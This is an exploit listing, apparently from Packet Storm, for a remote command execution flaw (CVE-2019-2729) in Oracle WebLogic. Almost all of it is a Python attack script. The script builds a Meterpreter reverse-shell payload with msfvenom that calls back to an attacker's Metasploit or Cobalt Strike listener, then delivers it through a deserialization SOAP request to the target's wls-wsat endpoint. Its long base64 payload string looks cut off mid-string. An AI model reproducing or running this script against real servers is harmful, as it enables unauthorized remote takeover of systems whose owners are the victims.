Oracle Weblogic 10.3.6.0.0 Remote Command Execution

2020-01-09T00:00:00
ID PACKETSTORM:155886
Type packetstorm
Reporter Paveway3
Modified 2020-01-09T00:00:00

Description

                                        
                                            `# Exploit Title: Oracle Weblogic 10.3.6.0.0 - Remote Command Execution  
# Date: 2020-01-08  
# Exploit Author: Waffles & Paveway3  
# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html  
# Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0  
# Tested on: Windows  
# CVE : CVE-2019-2729  
  
SerialLogic.py  
  
# Exploit Title: SerialLogic  
# Date: 01-08-2020  
# Exploit Author: Waffles & Paveway3  
# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html  
# Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0  
# Tested on: Windows  
# CVE : CVE-2019-2729  
  
import argparse  
import requests  
import sys  
import os  
import base64  
  
# Colors for terminal output because I likes pretty things  
class bcolors:  
OKGREEN = '\033[92m'  
BOLD = '\033[1m'  
NONERED = '\033[91m'  
ENDLINE = '\033[0m'  
UNDERLINE = '\033[4m'  
  
banner = """\n  
_______ ________ ___ ____ _______ ___ ________ ____   
/ ____/ | / / ____/ |__ \ / __ < / __ \ |__ \/__ /__ \/ __ \  
/ / | | / / __/________/ // / / / / /_/ /_______/ / / /__/ / /_/ /  
/ /___ | |/ / /__/_____/ __// /_/ / /\__, /_____/ __/ / // __/\__, /   
\____/ |___/_____/ /____/\____/_//____/ /____/ /_//____/____/   
"""  
  
print(banner)  
  
parser = argparse.ArgumentParser()  
parser.add_argument('-cs', dest='cobaltstrike', default=False, required=False, help="Use Cobalt Strike as callback", action='store_true')  
parser.add_argument('-msf', dest='metasploit', default=False, required=False, help="Use Metasploit Handler as callback", action='store_true')  
parser.add_argument('-rhost', dest='target_host', default='', required=True, help="Target Host")  
parser.add_argument('-rport', dest='target_port', default='', required=True, help="Target Port")  
parser.add_argument('-lhost', dest='listen_host', default='', required=True, help="Listening host IP for callback")  
parser.add_argument('-lport', dest='listen_port', default='', required=True, help="Listening port for callback")  
parser.add_argument('-ssl', dest='usessl', default=False, required=False, help="Use HTTPS instead of HTTP", action='store_true')  
args = parser.parse_args()  
  
print("\n")  
  
# Assign user arguments to variables we can use  
cobaltstrike = str(args.cobaltstrike)   
metasploit = str(args.metasploit)   
target_host = str(args.target_host)   
target_port = str(args.target_port)   
listen_host = str(args.listen_host)   
listen_port = str(args.listen_port)   
usessl = str(args.usessl)  
  
if cobaltstrike == 'True':  
cobaltstrike = True  
else:  
cobaltstrike = False  
if metasploit == 'True':  
metasploit = True  
else:  
metasploit = False  
if usessl == 'True':  
usessl = True  
else:  
usessl = False  
  
if metasploit and not cobaltstrike:  
os.system("msfvenom -p windows/meterpreter/reverse_tcp LHOST=" + listen_host + " LPORT=" + listen_port + " -f psh-cmd -o /tmp/CVE_2019_2729_MSF.txt > /dev/null 2>&1")  
with open('/tmp/CVE_2019_2729_MSF.txt', 'r') as msfcmd:  
the_cmd = msfcmd.read()  
elif cobaltstrike and not metasploit:  
os.system("msfvenom -p windows/meterpreter/reverse_http LHOST=" + listen_host + " LPORT=" + listen_port + " -f psh-cmd -o /tmp/CVE_2019_2729_CS.txt > /dev/null 2>&1")  
with open('/tmp/CVE_2019_2729_CS.txt', 'r') as cscmd:  
the_cmd = cscmd.read()  
else:  
print("Please try with ONE of the payload options.")  
sys.exit()  
  
headers = {  
'Content-Type':'text/xml',  
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0',  
'SOAPAction':'',  
'lfcmd':'' + the_cmd  
}  
  
data_pref = '<?xml version="1.0" encoding="utf-8"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <array method="forName"> <string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string> <void>'  
yss_payload = "CjxhcnJheSBjbGFzcz0iYnl0ZSIgbGVuZ3RoPSI2ODYyIj48dm9pZCBpbmRleD0iMTYwMSI+PGJ5dGU+MTAwPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTM4MSI+PGJ5dGU+NjQ8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyODkzIj48Ynl0ZT42NTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjEyMzUiPjxieXRlPjk5PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTE1Ij48Ynl0ZT4xMDg8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxMDkyIj48Ynl0ZT4xMTU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyNjE5Ij48Ynl0ZT42NjwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjIwOTEiPjxieXRlPjcyPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNjM1NCI+PGJ5dGU+MTA8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyMTY0Ij48Ynl0ZT4xMTU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxNTc4Ij48Ynl0ZT4xMDQ8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI4OTciPjxieXRlPjEwMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjE2MjUiPjxieXRlPjEyPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNjY0MSI+PGJ5dGU+NzI8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI2MjYyIj48Ynl0ZT40NzwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjM3MCI+PGJ5dGU+MTA1PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMjIxNiI+PGJ5dGU+NzQ8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI1MTQ3Ij48Ynl0ZT4xMTY8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxMjU1Ij48Ynl0ZT4xMDk8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyMDQiPjxieXRlPjEwMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjE0ODQiPjxieXRlPjk3PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNDEwOCI+PGJ5dGU+NjU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxNjQyIj48Ynl0ZT4xMTE8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI0MzE4Ij48Ynl0ZT4xMDU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI2NjUyIj48Ynl0ZT4yMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjYzMjQiPjxieXRlPjI8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI0OTY1Ij48Ynl0ZT4xMDE8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI2MTcxIj48Ynl0ZT40OTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjM2NTIiPjxieXRlPjY1PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTc4MyI+PGJ5dGU+MTA5PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMjc2NiI+PGJ5dGU+MTAwPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNTU5NCI+PGJ5dGU+MjwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9Ijk0MiI+PGJ5dGU+MTA4PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNDc4NiI+PGJ5dGU+NzY8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyMzU5Ij48Ynl0ZT4xMTk8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI1MzQxIj48Ynl0ZT4xMDU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI1MjkiPjxieXRlPjExMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjE3NTkiPjxieXRlPjExODwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjMxNDgiPjxieXRlPjEwNDwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjUyNjkiPjxieXRlPjExMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjU0MzIiPjxieXRlPjExNTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjIxMzkiPjxieXRlPjEwNTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjM2Ij48Ynl0ZT4tMzU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIzNTQ4Ij48Ynl0ZT44MjwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjQ3ODgiPjxieXRlPjk3PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTU0MSI+PGJ5dGU+NTA8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI1ODgxIj48Ynl0ZT40PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNTk0NyI+PGJ5dGU+LTc0PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNTIzNSI+PGJ5dGU+OTc8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyMTQ0Ij48Ynl0ZT43MDwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjMzNjEiPjxieXRlPjEwNDwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjI5NDciPjxieXRlPjg3PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMjQwOCI+PGJ5dGU+MTA4PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNjE4MyI+PGJ5dGU+MTAxPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTMyMCI+PGJ5dGU+NTA8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxODEzIj48Ynl0ZT4xMDM8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyODA4Ij48Ynl0ZT4xMTI8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyMDMiPjxieXRlPjgzPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNDI4NiI+PGJ5dGU+MTE1PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTY4OSI+PGJ5dGU+NDE8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIzNTgwIj48Ynl0ZT42OTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjMxMjEiPjxieXRlPjQ4PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMzEwMCI+PGJ5dGU+NjU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI0MTQyIj48Ynl0ZT42NTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjUzNyI+PGJ5dGU+OTc8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxNDE3Ij48Ynl0ZT4xMTU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI0NDk4Ij48Ynl0ZT41OTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjE5MzciPjxieXRlPjY1PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMjk4NSI+PGJ5dGU+MTA0PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTUwMCI+PGJ5dGU+MTAxPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNTQ0NyI+PGJ5dGU+NTY8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIzMzA0Ij48Ynl0ZT43MDwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjUwOTciPjxieXRlPjczPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRl  
data = base64.b64decode(yss_payload)  
data_payload = data_pref + data.decode()  
if usessl:  
attackurl = "https://" + str(target_host) + ":" + str(target_port) + str("/wls-wsat/CoordinatorPortType")  
else:  
attackurl = "http://" + str(target_host) + ":" + str(target_port) + str("/wls-wsat/CoordinatorPortType")  
res = requests.post(attackurl, headers=headers, data=data_payload, timeout=10)  
  
if cobaltstrike and not metasploit:  
cmd_exec = "Cobalt Strike"  
elif not cobaltstrike and metasploit:  
cmd_exec = "Metasploit"  
print(bcolors.OKGREEN + "[+] Command executed was a " + cmd_exec + " Payload, please check your console" + bcolors.ENDLINE)  
print(bcolors.OKGREEN + "[+] Cleaning up...." + bcolors.ENDLINE)  
  
if os.path.exists("/tmp/CVE_2019_2729_MSF.txt"):  
os.remove("/tmp/CVE_2019_2729_MSF.txt")  
elif os.path.exists("/tmp/CVE_2019_2729_CS.txt"):  
os.remove("/tmp/CVE_2019_2729_CS.txt")  
`